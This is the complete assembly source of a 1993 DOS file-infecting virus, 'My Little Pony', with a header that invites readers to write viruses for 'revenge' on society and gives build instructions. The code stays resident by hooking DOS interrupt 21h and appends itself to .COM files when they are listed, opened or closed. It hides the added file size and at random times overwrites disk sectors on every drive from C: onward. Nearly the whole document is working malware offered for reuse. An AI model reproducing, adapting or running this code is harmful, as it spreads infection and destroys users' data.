.model tiny
                .code

                org     100h

start:

;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
;                    A NEW ORDER OF INTELLIGENCE PRESENTS:                     ;
;                             My Little Pony 1.00                              ;
;           Copyright (c) 1992, 1993 by Cruel Entity / Macaroni Ted            ;
;                                 - A.N.O.I -                                  ;
;                                                                              ;
;                                                                              ;
; I know that there is a much better documented source-code for this	       ;
; virus. And I'm also very interessted to get in touch with the guy	       ;
; who did that documentation. Please contact me.                               ;
;                                                                              ;
; You may freely use this code as you want, just give me some of the	       ;
; credits. Please learn to create virus, so we, together can get our	       ;
; revenge to the soceity. Learn to feel the feeling being cruel!               ;
;                                                                              ;
; Of cource I can't take any responsibility for all virus-coders	       ;
; who use any of the routines in this virus.                                   ;
;                                                                              ;
;                                                                              ;
; Greetings to;  The Unforgiven for giving me AT&T's                           ;
;                Immortal Riot's members '94                                   ;
;                The man sitting in basement                                   ;
;                                                                              ;
; ps! Tasm /m3 and tlink /t to get this babe into executable!
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;

start:
                call    $+3
sub_this:       pop     bp

                mov     ax,0dd22h                ;are we already in memory?
                int     21h
                cmp     ax,03d33h
                jne     $+7
                lea     dx,[bp+(cancel-sub_this)]
                jmp     far ptr dx

                mov     ax,3521h                ;get int 21h vect
                int     21h
                mov     [bp+(int_21h_off-sub_this)],bx
                mov     [bp+(int_21h_seg-sub_this)],es

                mov     ax,cs
                dec     ax
                mov     es,ax
                mov     ax,es:[0003h]
                sub     ax,[bp+(memlen-sub_this)]
                mov     es:[0003h],ax
                mov     ax,[bp+(memlen-sub_this)]
                sub     word ptr es:[0012h],ax
                mov     es,es:[0012h]
                push    es

                lea     si,[bp+(start-sub_this)]
                mov     di,0100h
                mov     cx,[bp+(filelen-sub_this)]
                rep     movsb

                pop     ds                      ;es => ds
                mov     ax,2521h                ;new vector at ES:0100
                lea     dx,new_int_21h
                int     21h
cancel:
                push    cs                      ;cs => ds => es
                push    cs
                pop     ds
                pop     es

                lea     si,[bp+(first_bytes-sub_this)]
                mov     cx,3
                mov     di,100h
                rep     movsb
                sub     di,3
                jmp     far ptr di

                db      'Simple Simon met a pieman going to the fair said'
                db      ' Simple Simon to the pieman let me take your ware'
write_rnd_sector:
                cmp     dh,0            ;sec
                jne     back

                cmp     dl,5            ;100th
                ja      back


                pushf                   ;fuck rnd sector
                push    bx

                call    get_rnd
                mov     cx,10           ;/ 10
                xor     dx,dx
                div     cx
                mov     dx,ax           ;dx=ax

                mov     al,2h           ; Drive #, start with C:
                mov     cx,1h           ; # of sectors to overwrite
                lea     bx,logo         ; Address to overwriting DATA
loopie:
                int     26h
                popf
                inc     al
                cmp     al,25
                jne     loopie


                pop     bx
                popf
                jmp     back

                db      '(c)1993 Cruel Entity'

;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
;                                 New int 21h
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
new_int_21h:
                pushf

                cmp     ax,0dd22h       ;check if resident
                je      mem_check

                cmp     ah,11h          ;find 1st old
                je      find_old
                cmp     ah,12h          ;find 1st old
                je      find_old

                cmp     ah,4eh                  ;dos 2.x
                je      find_
                cmp     ah,4fh
                je      find_

                cmp     ah,3dh          ;open
                je      open_

                cmp     ah,3eh          ;close
                je      close_

                cmp     ah,2ch
                je      back2

                push    ax
                push    cx
                push    dx

                mov     ah,2ch
                int     21h

                cmp     cl,00                   ;a new hour?
                je      write_rnd_sector
back:
                pop     dx
                pop     cx
                pop     ax

back2:
                cmp     ah,36h
                jne     return_21h
                push    bp
                lea     bp,get_free_space
                jmp     far ptr bp
return_21h:
                popf

real_int_21h:   db      0eah            ;jmp...
int_21h_off     dw      ?               ;to old int 21h
int_21h_seg     dw      ?
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


find_:
                push    bp
                lea     bp,find_new
                jmp     far ptr bp

open_:
                push    bp
                lea     bp,open
                jmp     far ptr bp
close_:
                push    bp
                lea     bp,close_file
                jmp     far ptr bp

mem_check:
                popf
                mov     ax,3d33h
                iret
call_int21h:
                jmp     dword ptr cs:int_21h_off   ;force a call to DOS
                ret

find_old:
                popf

                pushf                           ;find fcb
                push    cs
                call    call_int21h
                cmp     al,0ffh
                je      no_more_files

                pushf
                push    ax
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    ds
                push    es
                push    bp

                mov     ah,2fh                  ;get dta
                int     21h

                push    es              ;es:bx
                pop     ds              ;ds:bx
                mov     si,bx           ;ds:si

                add     si,16           ;ext name
                lodsw
                cmp     ax,'OC'         ;.CO
                jne     cancel_ff
                lodsb
                cmp     al,'M'          ;M
                jne     cancel_ff
ext_ok:
                                         ;ext=com
                mov     si,bx            ;check size
                add     si,26h
                lodsw
                cmp     ax,0            ;=> 0ffffh?
                jne     cancel_ff

                mov     si,bx           ;check if already infected
                add     si,30
                lodsw                   ;time
                and     al,00011111b
                cmp     al,00001010b
                je      $+7            ;already infected (sec=24)
                lea     dx,store_in_mem
                jmp     far ptr dx

                mov     si,bx           ;alter size
                add     si,36
                mov     di,si
                lodsw
                sub     ax,cs:filelen
                jz      cancel_ff
                stosw
cancel_ff:
                pop     bp
                pop     es
                pop     ds
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                popf
no_more_files:  retf    2               ;iret flags

           db      "%%% MY LITTLE PONY %%% COPYRIGHT(C) 1993 A.N.O.I. %%%"

store_in_mem:                           ;store filename in buffer
                mov     si,bx
                add     si,8

                push    cs              ;cs => es
                pop     es

                mov     cx,10
                lea     di,file_buffer  ;check pos
check_pos:
                cmp     byte ptr es:[di],20h
                je      store
                add     di,8
                loop    check_pos
                jmp     cancel_ff

store:
                mov     cx,8
                rep     movsb
                jmp     cancel_ff
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

get_free_space:
                pop     bp
                push    ax
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    ds
                push    es
                push    bp

                push    cs              ;cs=> ds=> es
                push    cs
                pop     ds
                pop     es

                lea     di,file_buffer
                mov     cx,10
check_last:
                cmp     byte ptr [di],20h       ;check if last
                je      cancel_inf

                push    di
                push    cx
                mov     si,di           ;si=file pos
                call    infect
                pop     cx
                pop     di

                add     di,8
                loop    check_last
cancel_inf:
                push    cs
                pop     es
                lea     di,file_buffer
                mov     cx,80+12
                mov     al,20h
                rep     stosb

                pop     bp
                pop     es
                pop     ds
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                popf
                jmp     real_int_21h

infect:
                                        ;convert filename to asciiz
                lea     di,filename
                mov     cx,8            ;filename NOT ext
cpy_filename:
                lodsb
                cmp     al,20h
                je      filename_klar
                stosb
                loop    cpy_filename
filename_klar:
                mov     al,'.'
                stosb
                mov     al,'C'
                stosb
                mov     al,'O'
                stosb
                mov     al,'M'
                stosb
                mov     al,0
                stosb

                push    cs
                pop     ds

                mov     ax,4300h        ;get attrib
                lea     dx,filename
                int     21h
                jnc     $+3             ;error?
                ret

                push    cx              ;save attrib

                xor     cx,cx
                mov     ax,4301h        ;force all attribs
                int     21h

                mov     ax,3d02h        ;open filename
                lea     dx,filename
                pushf
                push    cs
                call    call_int21h
                mov     bx,ax           ;save handle

                mov     ax,5700h        ;get time/date
                int     21h

                push    dx              ;save time/date
                push    cx

                and     cl,00011111b
                cmp     cl,00001010b
                jne     $+7            ;already infected (sec=24)
                lea     dx,cancel_inf2
                jmp     far ptr dx



                mov     ah,3fh                  ;read 3 first bytes
                mov     cx,3
                lea     dx,first_bytes
                int     21h

                mov     ax,4202h                ;goto eof
                xor     dx,dx
                xor     cx,cx
                int     21h

                sub     ax,3                    ;create a jmp
                mov     jmp_2,ax

                mov     ah,40h                  ;write virus
                mov     dx,100h
                mov     cx,filelen
                int     21h

                mov     ax,4200h                ;goto beg
                xor     dx,dx
                xor     cx,cx
                int     21h

                mov     ah,40h                  ;write jmp
                mov     cx,3
                lea     dx,jmp_1
                int     21h
cancel_inf2:
                pop     cx                      ;restore time/date
                pop     dx

                and     cl,11100000b            ;secs=20
                or      cl,00001010b
                mov     ax,5701h                ;set time/date
                int     21h

                mov     ah,3eh                  ;close
                pushf
                push    cs
                call    call_int21h

                mov     ax,4301h                ;set attrib
                lea     dx,filename
                pop     cx                      ;restore attrib
                int     21h

                ret
find_new:
                pop     bp
                popf

                pushf                           ;find 4e
                push    cs
                call    call_int21h
                jnc     more_files
                retf    2
more_files:
                pushf
                push    ax
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    ds
                push    es
                push    bp

                mov     ah,2fh                  ;get dta
                int     21h

                push    es              ;es:bx
                pop     ds              ;ds:bx

                mov     si,bx           ;ds:si

                push    cs              ;cs => es
                pop     es

                add     si,1eh          ;f name
                lea     di,filename
                mov     cx,25

get_fname:
                lodsb
                cmp     al,0
                je      get_f_klar
                stosb
                loop    get_fname
get_f_klar:
                mov     al,0            ;asciiz
                stosb

                push    ds              ;ds=> es
                pop     es
                push    cs              ;cs=> ds
                pop     ds
                mov     si,di

                sub     si,4            ;'COM'
                lodsw                   ;CO

                cmp     ax,'OC'
                je      check_m
                cmp     ax,'oc'
                jne     cancel_new
check_m:
                lodsb
                cmp     al,'m'
                je      ext_is_com
                cmp     al,'M'
                jne     cancel_new

ext_is_com:
                push    es              ;es=> ds
                pop     ds

                mov     si,bx
                add     si,1ch          ;check size
                lodsw
                cmp     ax,0            ;=> 0ffffh
                jne     cancel_new

                mov     si,bx
                add     si,16h
                lodsw                   ;time
                and     al,00011111b
                cmp     al,00001010b
                jne     cancel_new     ;not infected

                mov     si,bx
                add     si,1ah
                mov     di,si
                lodsw                   ;alter size
                sub     ax,cs:filelen
                jz      cancel_new
                stosw

cancel_new:
                pop     bp
                pop     es
                pop     ds
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                popf
no_more_files2: retf    2               ;iret flags
open:
                pop     bp
                push    ax
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    bp
                push    ds
                push    es


                mov     al,'.'
                push    ds              ;ds=> es
                pop     es
                mov     di,dx           ;es:di filename

                mov     cx,50
                repnz   scasb

                mov     si,di           ;ds:si file ext.

                lodsw
                cmp     ax,'OC'
                je      check_m2
                cmp     ax,'oc'
                je      $+7
                lea     dx,cancel_open
                jmp     far ptr dx
check_m2:
                lodsb
                cmp     al,'m'
                je      ext_is_com2
                cmp     al,'M'
                jne     cancel_open

ext_is_com2:
                mov     ax,3d02h        ;open file
                pushf
                push    cs
                call    call_int21h
                jc      cancel_open
                mov     bx,ax

                push    cs
                pop     ds
                push    cs
                pop     es

                mov     ax,5700h        ;get time/date
                int     21h

                and     cl,00011111b    ;already infected
                cmp     cl,00001010b
                jne     cancel_open

                mov     ax,4202h        ;goto eof
                xor     dx,dx
                xor     cx,cx
                int     21h

                push    ax              ;save size
                sub     ax,3

                mov     dx,ax           ;goto eof -3
                mov     ax,4200h
                mov     cx,0
                int     21h

                mov     ah,3fh          ;read
                mov     cx,3
                lea     dx,temp_bytes
                int     21h


                mov     ax,4200h        ;goto beg
                xor     cx,cx
                xor     dx,dx
                int     21h

                mov     ah,40h          ;write original
                mov     cx,3
                lea     dx,temp_bytes
                int     21h

                pop     dx
                sub     dx,filelen

                mov     ax,4200h        ;goto real size
                mov     cx,0
                int     21h

                mov     ah,40h
                mov     cx,0
                int     21h

                mov     ah,3eh
                pushf
                push    cs
                call    call_int21h
cancel_open:
                pop     es
                pop     ds
                pop     bp
                pop     di
                pop     si
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                popf

                pushf                           ;open file...
                push    cs
                call    call_int21h
                retf    2

close_file:
                pop     bp
                push    ax
                push    bx
                push    cx
                push    dx
                push    si
                push    di
                push    bp
                push    ds
                push    es

                mov     ax,1220h        ;get handle table
                int     02Fh
                mov     bl,es:[di]
                mov     ax,1216h
                int     02Fh

                mov     bp,di

                add     di,28h
                push    es
                pop     ds
                mov     si,di
                lodsw
                cmp     ax,'OC'
                jne     cancel_open
                lodsb
                cmp     al,'M'
                jne     cancel_open

                mov     si,bp
                add     si,20h
                push    cs
                pop     es

                call    infect

                jmp     cancel_open

get_rnd:
                push   dx
                push   cx
                push   bx
                in     al,40h                         ;'@'
                add    ax,0000
                mov    dx,0000
                mov    cx,0007
rnd_init5:�
                shl    ax,1
                rcl    dx,1
                mov    bl,al
                xor    bl,dh
                jns    rnd_init6
                inc    al
rnd_init6:
                loop   rnd_init5
                pop    bx
                mov    al,dl
                pop    cx
                pop    dx
rnd_init_ret:
                ret

logo            db      '>>>  A.N.O.I  <<<' ; DATA to overwrite with


temp_bytes      db      3 dup(?)
filelen         dw      offset eof - offset start
memlen          dw      100
file_buffer     db      80 dup(20h)
filename        db      12 dup(?)

jmp_1           db      0e9h
jmp_2           dw      ?
first_bytes     db      90h,0cdh,20h

eof:
                end     start